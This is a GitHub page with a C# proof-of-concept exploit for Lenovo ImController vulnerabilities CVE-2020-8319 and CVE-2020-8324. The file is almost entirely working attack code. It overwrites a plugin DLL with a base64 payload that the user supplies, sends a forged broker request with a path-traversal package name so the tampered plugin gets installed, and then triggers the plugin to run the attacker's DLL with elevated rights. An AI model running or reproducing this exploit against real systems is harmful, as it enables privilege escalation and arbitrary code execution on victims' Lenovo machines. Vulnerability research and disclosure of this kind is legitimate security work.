-
Notifications
You must be signed in to change notification settings - Fork 6
/
CVE-2020-8319_CVE-2020-8324.cs
200 lines (171 loc) · 8.44 KB
/
CVE-2020-8319_CVE-2020-8324.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
using Lenovo.Modern.ImController.ImClient.Models;
using Lenovo.Modern.ImController.ImClient.Services;
using Lenovo.Modern.ImController.ImClient.Services.Umdf;
using Lenovo.Modern.ImController.PluginManager.Services;
using Lenovo.Modern.ImController.Shared.Services;
using Lenovo.Modern.Utilities.Patterns.Ioc;
using Lenovo.Modern.Utilities.Services;
using Microsoft.Win32;
using System;
using System.IO;
using System.Threading;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Serialization;
namespace Playground {
class LenovoExploit {
//Replace with your own Uber exploit DLL
const string exploitDLL = "";
DeviceDriverAgent _deviceAgent;
private string Serialize<T>(T instance) {
string result = null;
using (StringWriter stringWriter = new StringWriter()) {
XmlSerializer xmlSerializer = new XmlSerializer(typeof(T));
using (XmlWriter xmlWriter = XmlWriter.Create(stringWriter)) {
xmlSerializer.Serialize(xmlWriter, instance);
}
result = stringWriter.ToString();
}
return result;
}
private void CopyFolder(string sourceFolder, string destFolder) {
if (!Directory.Exists(destFolder))
Directory.CreateDirectory(destFolder);
string[] files = Directory.GetFiles(sourceFolder);
foreach (string file in files) {
string name = Path.GetFileName(file);
string dest = Path.Combine(destFolder, name);
File.Copy(file, dest, true);
}
string[] folders = Directory.GetDirectories(sourceFolder);
foreach (string folder in folders) {
string name = Path.GetFileName(folder);
string dest = Path.Combine(destFolder, name);
CopyFolder(folder, dest);
}
}
private void PrepareFolders() {
CopyFolder(@"C:\ProgramData\Lenovo\ImController\Plugins\LenovoAppScenarioPluginSystem", @"C:\ProgramData\Lenovo\LenovoAppScenarioPluginSystem_");
byte[] data = System.Convert.FromBase64String(exploitDLL);
using (BinaryWriter writer = new BinaryWriter(File.Open(@"C:\ProgramData\Lenovo\LenovoAppScenarioPluginSystem_\x64\TouchScreenContronlDLL.dll", FileMode.Truncate, FileAccess.ReadWrite))) {
writer.Write(data);
}
}
private async Task<BrokerResponse> GetResponseAsync(Guid taskId, Func<BrokerResponseTask, bool> responseReceivedHandler, CancellationToken cancelToken) {
BrokerResponse brokerResponse = null;
if (taskId == Guid.Empty) {
throw new ArgumentException(string.Format("Invalid task ID provided: {0}", taskId));
}
Tuple<Guid, string> tuple = await _deviceAgent.WaitForResponseAsync(taskId, cancelToken);
if (tuple == null && cancelToken.IsCancellationRequested) {
throw new BrokerRequestAgentException(string.Format("CancelToken is canceled while waiting for response for task {0}: response pair is null", taskId)) {
ResponseCode = 408
};
}
if (tuple == null) {
throw new BrokerRequestAgentException(string.Format("Invalid/Empty Broker Response provided for task {0}: response pair is null", taskId)) {
ResponseCode = 408
};
}
if (string.IsNullOrWhiteSpace(tuple.Item2)) {
throw new BrokerRequestAgentException(string.Format("Invalid/Empty Broker Response XML provided for task {0}", taskId)) {
ResponseCode = 408
};
}
try {
brokerResponse = Serializer.Deserialize<BrokerResponse>(tuple.Item2);
} catch (Exception) {
Console.WriteLine("GetFinalContractResponseAsync exception on response deserialization. responsePair.Item2 = " + tuple.Item2.Length);
}
if (brokerResponse == null || brokerResponse.Task == null) {
throw new BrokerRequestAgentException("Invalid broker response data") {
ResponseCode = 409
};
}
return brokerResponse;
}
private async Task<BrokerResponse> GetFinalContractResponseAsync(Guid taskId, Func<BrokerResponseTask, bool> responseReceivedHandler, CancellationToken cancelToken) {
BrokerResponse brokerResponse = null;
bool final = false;
while (!final) {
BrokerResponse brokerResponse2 = await GetResponseAsync(taskId, responseReceivedHandler, cancelToken);
brokerResponse = brokerResponse2;
bool flag = false;
if (brokerResponse.Error != null && brokerResponse.Error.ResultCode != 0) {
flag = false;
}
if (!flag || brokerResponse.Task.IsComplete) {
final = true;
}
}
await _deviceAgent.CloseTaskAsync(taskId);
return brokerResponse;
}
private async Task<BrokerResponse> sendBrokerRequest(BrokerRequest brokerRequest) {
string command = Serialize<BrokerRequest>(brokerRequest);
Guid guid = await _deviceAgent.PutRequestAsync(command);
BrokerResponse br = await GetFinalContractResponseAsync(guid, (func) => {
return true;
}, CancellationToken.None);
return br;
}
public async void Exploit() {
Console.WriteLine("[+] Preparing exploitable plugin package");
PrepareFolders();
Console.WriteLine("[+] Setting up requred BrokerResponseAgent");
InstanceContainer instance = InstanceContainer.GetInstance();
instance.RegisterInstance<IBrokerResponseAgent>(BrokerResponseAgent.GetInstance());
instance.RegisterInstance<IPluginManager>(PluginManager.GetInstance());
Console.WriteLine("[+] Setting up UDMF driver agent");
_deviceAgent = DeviceDriverAgent.GetInstance();
if(_deviceAgent == null) {
Console.WriteLine("[!] Failed to get instance of UDMF driver agent, is this a Lenovo machine with ImController installed?");
return;
}
BrokerRequest breq = new BrokerRequest();
breq.Version = "1";
breq.Authentication = new BrokerAuthentication();
breq.Authentication.Token = "pwned";
breq.BrokerRequirements = new BrokerRequirements();
breq.BrokerRequirements.MinVersion = "1";
string contractRequestParameter = @"
<InstallPendingRequest>
<PackageList>
<Package name=""..\..\..\LenovoAppScenarioPluginSystem""/>
</PackageList>
</InstallPendingRequest>";
breq.ContractRequest = new ContractRequest {
Command = new ContractCommandRequest {
Name = "Install-PendingUpdates",
Parameter = contractRequestParameter,
RequestType = "sync"
},
Name = "ImController"
};
Console.WriteLine("[+] Sending Install-PendingUpdates BrokerRequest");
BrokerResponse br = await sendBrokerRequest(breq);
if(br.Result != "Success") {
Console.WriteLine("[!] Request for Install-PendingUpdates failed");
return;
}
Console.WriteLine("[-] Waiting for plugin to install, this can take a few minutes");
Thread.Sleep(5000);
while (Directory.Exists(@"C:\ProgramData\Lenovo\ImController\Plugins\LenovoAppScenarioPluginSystem_")) {
Thread.Sleep(1000);
}
Thread.Sleep(1000);
Console.WriteLine("[+] Package delivered!");
Console.WriteLine("[+] Making plugin request to trigger exploit");
breq.ContractRequest = new ContractRequest {
Command = new ContractCommandRequest {
Name = "Get-TouchScreenState",
Parameter = null,
RequestType = "sync"
},
Name = "SystemManagement.AppScenario.System"
};
br = await sendBrokerRequest(breq);
Console.WriteLine("[+] Enjoy");
}
}
}